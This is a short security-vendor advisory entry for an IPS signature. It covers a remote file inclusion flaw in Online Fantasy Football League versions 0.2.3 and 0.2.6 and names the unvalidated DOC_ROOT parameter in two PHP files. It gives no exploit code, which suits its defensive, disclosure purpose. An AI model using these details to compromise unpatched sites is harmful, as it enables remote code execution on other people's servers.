OFFL.DOC.ROOT.File.Inclusion
Description
This indicates a vulnerability in Online Fantasy Football League (OFFL). This vulnerability is caused the failure to validate the "DOC_ROOT" parameter in the "lib/functions.php" and "lib/header.php" scripts. It allows remote attackers to include malicious PHP scripts and execute arbitrary commands.
Affected Products
OFFL OFFL 0.2.6
OFFL OFFL 0.2.3
Impact
System compromise, remote script execution.
Recommended Actions
Currently we are not aware of any official fix for this issue.
Telemetry
Coverage
IPS (Regular DB) | |
IPS (Extended DB) |